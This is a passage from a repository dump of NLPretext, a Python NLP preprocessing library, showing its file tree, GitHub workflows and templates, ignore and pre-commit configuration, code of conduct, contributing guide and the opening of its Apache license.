Repository: artefactory/NLPretext
Branch: main
Commit: 0d2cc4fe9e5d
Files: 72
Total size: 410.9 KB
Directory structure:
gitextract_i1k0jy7m/
├── .dockerignore
├── .editorconfig
├── .github/
│ ├── .stale.yml
│ ├── CODEOWNERS
│ ├── ISSUE_TEMPLATE/
│ │ ├── bug_report.md
│ │ ├── config.yml
│ │ ├── feature_request.md
│ │ └── question.md
│ ├── PULL_REQUEST_TEMPLATE.md
│ ├── dependabot.yml
│ ├── release-drafter.yml
│ └── workflows/
│ ├── cd.yml
│ ├── ci.yml
│ ├── greetings.yml
│ └── release-drafter.yml
├── .gitignore
├── .pre-commit-config.yaml
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── LICENSE
├── Makefile
├── README.md
├── SECURITY.md
├── datasets/
│ └── external/
│ ├── get_language_dataset.sh
│ └── get_stanfordtweets.sh
├── docker/
│ ├── Dockerfile
│ └── README.md
├── docs/
│ ├── Makefile
│ ├── make.bat
│ ├── scripts/
│ │ └── buildsite.sh
│ └── source/
│ ├── _templates/
│ │ ├── module.rst_t
│ │ ├── package.rst_t
│ │ └── versions.html
│ ├── conf.py
│ ├── index.rst
│ └── tutorials/
│ ├── basic_notebook.ipynb
│ └── index.rst
├── nlpretext/
│ ├── __init__.py
│ ├── _config/
│ │ ├── __init__.py
│ │ ├── config.py
│ │ ├── constants.py
│ │ └── stopwords.py
│ ├── _utils/
│ │ ├── __init__.py
│ │ ├── daskloader.py
│ │ ├── file_loader.py
│ │ ├── pandasloader.py
│ │ ├── phone_number.py
│ │ └── stopwords.py
│ ├── augmentation/
│ │ ├── __init__.py
│ │ └── text_augmentation.py
│ ├── basic/
│ │ ├── __init__.py
│ │ └── preprocess.py
│ ├── cli/
│ │ ├── __init__.py
│ │ ├── __main__.py
│ │ └── preprocess.py
│ ├── preprocessor.py
│ ├── py.typed
│ ├── social/
│ │ ├── __init__.py
│ │ └── preprocess.py
│ ├── textloader.py
│ └── token/
│ ├── __init__.py
│ ├── preprocess.py
│ └── tokenizer.py
├── pyproject.toml
├── references/
│ └── .gitkeep
└── tests/
├── __init__.py
├── test_data_augmentation.py
├── test_file_loader.py
├── test_phone_number.py
├── test_preprocessor.py
├── test_textloader.py
└── test_tokenizer.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .dockerignore
================================================
# Git
.git
.gitignore
.github
# Docker
.dockerignore
docker/
# IDE
.idea
.vscode
# Byte-compiled / optimized / DLL files
__pycache__/
**/__pycache__/
*.pyc
*.pyo
*.pyd
.Python
*.py[cod]
*$py.class
.pytest_cache/
.mypy_cache/
# poetry
.venv
# C extensions
*.so
# Virtual environment
.venv
venv
.DS_Store
.AppleDouble
.LSOverride
._*
================================================
FILE: .editorconfig
================================================
# Check http://editorconfig.org for more information
# This is the main config file for this project:
root = true
[*]
charset = utf-8
end_of_line = lf
insert_final_newline = true
indent_style = space
indent_size = 2
trim_trailing_whitespace = true
[*.{py, pyi}]
indent_style = space
indent_size = 4
[Makefile]
indent_style = tab
[*.md]
trim_trailing_whitespace = false
[*.{diff,patch}]
trim_trailing_whitespace = false
================================================
FILE: .github/.stale.yml
================================================
# Number of days of inactivity before an issue becomes stale
daysUntilStale: 60
# Number of days of inactivity before a stale issue is closed
daysUntilClose: 7
# Issues with these labels will never be considered stale
exemptLabels:
- pinned
- security
# Label to use when marking an issue as stale
staleLabel: wontfix
# Comment to post when marking an issue as stale. Set to `false` to disable
markComment: >
This issue has been automatically marked as stale because it has not had
recent activity. It will be closed if no further activity occurs. Thank you
for your contributions.
# Comment to post when closing a stale issue. Set to `false` to disable
closeComment: false
================================================
FILE: .github/CODEOWNERS
================================================
# https://help.github.com/en/articles/about-code-owners
* @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: 🐛 Bug report
about: If something isn't working 🔧
title: ''
labels: bug
assignees:
---
## 🐛 Bug Report
## 🔬 How To Reproduce
Steps to reproduce the behavior:
1. ...
### Code sample
### Environment
* OS: [e.g. Linux / Windows / macOS]
* Python version, get it with:
```bash
python --version
```
### Screenshots
## 📈 Expected behavior
## 📎 Additional context
================================================
FILE: .github/ISSUE_TEMPLATE/config.yml
================================================
# Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository
blank_issues_enabled: false
================================================
FILE: .github/ISSUE_TEMPLATE/feature_request.md
================================================
---
name: 🚀 Feature request
about: Suggest an idea for this project 🏖
title: ''
labels: enhancement
assignees:
---
## 🚀 Feature Request
## 🔈 Motivation
## 🛰 Alternatives
## 📎 Additional context
================================================
FILE: .github/ISSUE_TEMPLATE/question.md
================================================
---
name: ❓ Question
about: Ask a question about this project 🎓
title: ''
labels: question
assignees:
---
## Checklist
- [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext/issues?q=is%3Aissue).
## ❓ Question
How can I [...]?
Is it possible to [...]?
## 📎 Additional context
================================================
FILE: .github/PULL_REQUEST_TEMPLATE.md
================================================
## Description
## Related Issue
## Type of Change
- [ ] 📚 Examples / docs / tutorials / dependencies update
- [ ] 🔧 Bug fix (non-breaking change which fixes an issue)
- [ ] 🥂 Improvement (non-breaking change which improves an existing feature)
- [ ] 🚀 New feature (non-breaking change which adds functionality)
- [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change)
- [ ] 🔐 Security fix
## Checklist
- [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext/blob/main/CODE_OF_CONDUCT.md) document.
- [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext/blob/main/CONTRIBUTING.md) guide.
- [ ] I've updated the code style using `make format-code`.
- [ ] I've written tests for all new methods and classes that I created.
- [ ] I've written the docstring in NumPy format for all the methods and classes that I used.
================================================
FILE: .github/dependabot.yml
================================================
# Configuration: https://dependabot.com/docs/config-file/
# Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically
version: 2
updates:
- package-ecosystem: "pip"
directory: "/"
schedule:
interval: "weekly"
day: "monday"
time: "09:00"
allow:
- dependency-type: "all"
ignore:
- dependency-name: "*"
update-types: ["version-update:semver-patch"]
labels:
- draft
- dependencies
- python
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
day: "monday"
time: "09:00"
allow:
- dependency-type: "all"
labels:
- draft
- dependencies
- github_actions
- package-ecosystem: "docker"
directory: "/docker/"
schedule:
interval: "weekly"
day: "monday"
time: "09:00"
allow:
- dependency-type: "all"
labels:
- draft
- dependencies
- docker
================================================
FILE: .github/release-drafter.yml
================================================
# Release drafter configuration https://github.com/release-drafter/release-drafter#configuration
# Emojis were chosen to match the https://gitmoji.carloscuesta.me/
name-template: "$NEXT_PATCH_VERSION"
tag-template: "$NEXT_PATCH_VERSION"
categories:
- title: ":rocket: Features"
labels: [enhancement, feature]
- title: ":wrench: Fixes & Refactoring"
labels: [bug, refactoring, bugfix, fix]
- title: ":package: Build System & CI/CD"
labels: [build, ci, testing]
- title: ":boom: Breaking Changes"
labels: [breaking]
- title: ":pencil: Documentation"
labels: [documentation]
- title: ":arrow_up: Dependencies updates"
labels: [dependencies]
template: |
## What’s Changed
$CHANGES
## :busts_in_silhouette: List of contributors
$CONTRIBUTORS
================================================
FILE: .github/workflows/cd.yml
================================================
name: Continuous Deployment
on:
release:
types: [published]
jobs:
docker:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v3
- name: Login to Github Container Registry
uses: docker/login-action@v3
with:
username: ${{ github.actor }}
password: ${{ secrets.GITHUB_TOKEN }}
registry: ghcr.io
- name: Set tag name
id: tag
run: echo "tag_name=${GITHUB_REF//\//-}" >> $GITHUB_OUTPUT
env:
GITHUB_REF: ${{ github.ref }}
- name: Build and push
uses: docker/build-push-action@v4
with:
context: .
file: ./docker/Dockerfile
push: true
tags: |
ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}
ghcr.io/artefactory/nlpretext:latest
cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest
cache-to: type=inline
- name: Scan image
uses: anchore/scan-action@v3
id: scan
with:
image: "ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}"
output-format: table
- name: upload Anchore scan SARIF report
if: success() || failure()
uses: github/codeql-action/upload-sarif@v2
with:
sarif_file: ${{ steps.scan.outputs.sarif }}
documentation_and_package:
runs-on: ubuntu-latest
strategy:
matrix:
python-version: ["3.8"]
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- name: Install poetry and pandoc
run: |
sudo apt-get install pandoc
make download-poetry
- name: Set up cache
uses: actions/cache@v3.3.2
with:
path: ~/.cache/pypoetry/virtualenvs
key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}
- name: Set Poetry Path
run: |
echo "$HOME/.poetry/bin" >> $GITHUB_PATH
- name: Install dependencies
run: |
poetry install -E torch -E dask
- name: Publish to PyPI
env:
PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
run: |
poetry config pypi-token.pypi $PYPI_TOKEN
poetry publish --build
- name: Run build script for Sphinx pages
run: |
poetry run git config --global user.name "Github-Pages Bot"
poetry run git config --global user.email "github-pages@artefactory.com"
poetry run sh docs/scripts/buildsite.sh
shell: bash
================================================
FILE: .github/workflows/ci.yml
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
name: Continuous Integration
on:
push:
branches:
- main
pull_request:
branches:
- '*'
jobs:
ci:
runs-on: ubuntu-latest
strategy:
matrix:
python-version: ["3.8", "3.9", "3.10"]
if: ${{ !contains(github.event.pull_request.labels.*.name, 'draft') }}
steps:
- uses: actions/checkout@v2
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
cache: 'pip'
- name: Install poetry
run: make download-poetry
- name: Set up pip cache
uses: actions/cache@v3.3.2
with:
path: ~/.cache/pypoetry/virtualenvs
key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}
- name: Set up mypy cache
uses: actions/cache@v3.2.4
with:
path: ${{ github.workspace }}/.mypy_cache
key: mypy-${{ matrix.python-version }}
- name: Set Poetry Path
run: |
echo "$HOME/.poetry/bin" >> $GITHUB_PATH
- name: Install dependencies
run: |
poetry run pip install --upgrade pip
poetry install -E torch -E dask
- name: Run safety checks
run: |
STRICT=1 make check-safety
- name: Lint and format
run: |
make format-code
- name: Run tests
run: |
make test
================================================
FILE: .github/workflows/greetings.yml
================================================
name: Greetings
on:
pull_request:
types:
- opened
- reopened
- edited
- labeled
- unlabeled
- synchronize
issues:
jobs:
greeting:
runs-on: ubuntu-latest
if: ${{ !contains(github.head_ref, 'dependabot/') }}
steps:
- uses: actions/first-interaction@v1
with:
repo-token: ${{ secrets.GITHUB_TOKEN }}
pr-message: 'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.'
issue-message: |
Hello @${{ github.actor }}, thank you for your interest in our work!
If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we cannot help you.
================================================
FILE: .github/workflows/release-drafter.yml
================================================
name: Release Drafter
on:
push:
# branches to consider in the event; optional, defaults to all
branches:
- main
jobs:
update_release_draft:
runs-on: ubuntu-latest
steps:
# Drafts your next Release notes as Pull Requests are merged into "main"
- uses: release-drafter/release-drafter@v5.22.0
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
================================================
FILE: .gitignore
================================================
# Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode
# Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode
### OSX ###
# General
.DS_Store
.AppleDouble
.LSOverride
# Icon must end with two \r
Icon
# Thumbnails
._*
# Files that might appear in the root of a volume
.DocumentRevisions-V100
.fseventsd
.Spotlight-V100
.TemporaryItems
.Trashes
.VolumeIcon.icns
.com.apple.timemachine.donotpresent
# Directories potentially created on remote AFP share
.AppleDB
.AppleDesktop
Network Trash Folder
Temporary Items
.apdisk
### PyCharm ###
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
# User-specific stuff
.idea/
.idea/**/workspace.xml
.idea/**/tasks.xml
.idea/**/usage.statistics.xml
.idea/**/dictionaries
.idea/**/shelf
# Generated files
.idea/**/contentModel.xml
# Sensitive or high-churn files
.idea/**/dataSources/
.idea/**/dataSources.ids
.idea/**/dataSources.local.xml
.idea/**/sqlDataSources.xml
.idea/**/dynamic.xml
.idea/**/uiDesigner.xml
.idea/**/dbnavigator.xml
# Gradle
.idea/**/gradle.xml
.idea/**/libraries
# Gradle and Maven with auto-import
# When using Gradle or Maven with auto-import, you should exclude module files,
# since they will be recreated, and may cause churn. Uncomment if using
# auto-import.
# .idea/modules.xml
# .idea/*.iml
# .idea/modules
# *.iml
# *.ipr
# CMake
cmake-build-*/
# Mongo Explorer plugin
.idea/**/mongoSettings.xml
# File-based project format
*.iws
# IntelliJ
out/
# mpeltonen/sbt-idea plugin
.idea_modules/
# JIRA plugin
atlassian-ide-plugin.xml
# Cursive Clojure plugin
.idea/replstate.xml
# Crashlytics plugin (for Android Studio and IntelliJ)
com_crashlytics_export_strings.xml
crashlytics.properties
crashlytics-build.properties
fabric.properties
# Editor-based Rest Client
.idea/httpRequests
# Android studio 3.1+ serialized cache file
.idea/caches/build_file_checksums.ser
### PyCharm Patch ###
# Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721
# *.iml
# modules.xml
# .idea/misc.xml
# *.ipr
# Sonarlint plugin
.idea/**/sonarlint/
# SonarQube Plugin
.idea/**/sonarIssues.xml
# Markdown Navigator plugin
.idea/**/markdown-navigator.xml
.idea/**/markdown-navigator/
### Python ###
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/
.ruff_cache/
# Translations
*.mo
*.pot
# Scrapy stuff:
.scrapy
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# pyenv
.python-version
# poetry
.venv
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# celery beat schedule file
celerybeat-schedule
# SageMath parsed files
*.sage.py
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# Mr Developer
.mr.developer.cfg
.project
.pydevproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Plugins
.secrets.baseline
### VisualStudioCode ###
.vscode/*
!.vscode/tasks.json
!.vscode/launch.json
!.vscode/extensions.json
### VisualStudioCode Patch ###
# Ignore all local history of files
.history
### Windows ###
# Windows thumbnail cache files
Thumbs.db
Thumbs.db:encryptable
ehthumbs.db
ehthumbs_vista.db
# Dump file
*.stackdump
# Folder config file
[Dd]esktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Windows Installer files
*.cab
*.msi
*.msix
*.msm
*.msp
# Windows shortcuts
*.lnk
### VisualStudio ###
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
# DotEnv configuration
.env
# Database
*.db
*.rdb
# Pycharm
.idea
venv/
# VS Code
.vscode/
# Spyder
.spyproject/
# Jupyter NB Checkpoints
.ipynb_checkpoints/
# exclude data from source control by default
# vim
*.swp
*.swo
data/
================================================
FILE: .pre-commit-config.yaml
================================================
default_language_version:
python: python3.10
repos:
- repo: https://github.com/pre-commit/pre-commit-hooks
rev: v4.5.0
hooks:
- id: trailing-whitespace
- id: end-of-file-fixer
- id: check-yaml
- id: check-toml
- id: check-json
- id: check-added-large-files
- repo: local
hooks:
- id: isort
name: isort
entry: poetry run isort --settings-path pyproject.toml
types: [python]
language: system
stages: [commit, push]
- id: pyupgrade
name: pyupgrade
entry: poetry run pyupgrade --py38-plus
types: [python]
language: system
stages: [commit, push]
- id: black
name: black
entry: poetry run black --config pyproject.toml
types: [python]
language: system
stages: [commit, push]
- id: ruff
name: ruff
entry: poetry run ruff check --config pyproject.toml
types: [python]
language: system
stages: [commit, push]
- id: mypy
name: mypy
entry: poetry run mypy
require_serial: true
types: [python]
language: system
stages: [push]
- id: gitleaks
name: gitleaks
entry: make gitleaks
require_serial: true
types: [file]
language: system
pass_filenames: false
stages: [push]
================================================
FILE: CODE_OF_CONDUCT.md
================================================
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, sex characteristics, gender identity and expression,
level of experience, education, socio-economic status, nationality, personal
appearance, race, religion, or sexual identity and orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at rafaelle.aygalenq@artefact.com. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
https://www.contributor-covenant.org/faq
================================================
FILE: CONTRIBUTING.md
================================================
NLPretext
==============================
# How to contribute
## Dependencies
We use `poetry` to manage the [dependencies](https://github.com/python-poetry/poetry).
If you don't have `poetry` installed, you should run the command below.
```bash
make download-poetry; export PATH="$HOME/.local/bin:$PATH"
```
To install dependencies and prepare [`pre-commit`](https://pre-commit.com/) hooks you would need to run `install` command:
```bash
make install
```
To activate your `virtualenv` run `poetry shell`.
## Codestyle
After you run `make install` you can execute the automatic code formatting.
```bash
make format-code
```
### Checks
Many checks are configured for this project. Command `make check-style` will run black diffs, darglint docstring style and mypy.
The `make check-safety` command will look at the security of your code.
You can also use the `STRICT=1` flag to make the check be strict.
### Before submitting
Before submitting your code please do the following steps:
1. Add any changes you want
1. Add tests for the new changes
1. Edit documentation if you have changed something significant
1. Run `make format-code` to format your changes.
1. Run `STRICT=1 make check-style` to ensure that types and docs are correct
1. Run `STRICT=1 make check-safety` to ensure that security of your code is correct
## Other help
You can contribute by spreading a word about this library.
It would also be a huge contribution to write
a short article on how you are using this project.
You can also share your best practices with us.
# Docstring format
We chose to use **Numpydoc** over the several [standards](https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format)
```
"""
My numpydoc description of a kind
of very exhaustive numpydoc format docstring.
Parameters
----------
first : array_like
the 1st param name `first`
second :
the 2nd param
third : {'value', 'other'}, optional
the 3rd param, by default 'value'
Returns
-------
string
a value in a string
Raises
------
KeyError
when a key error
OtherError
when an other error
"""
```
================================================
FILE: LICENSE
================================================
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
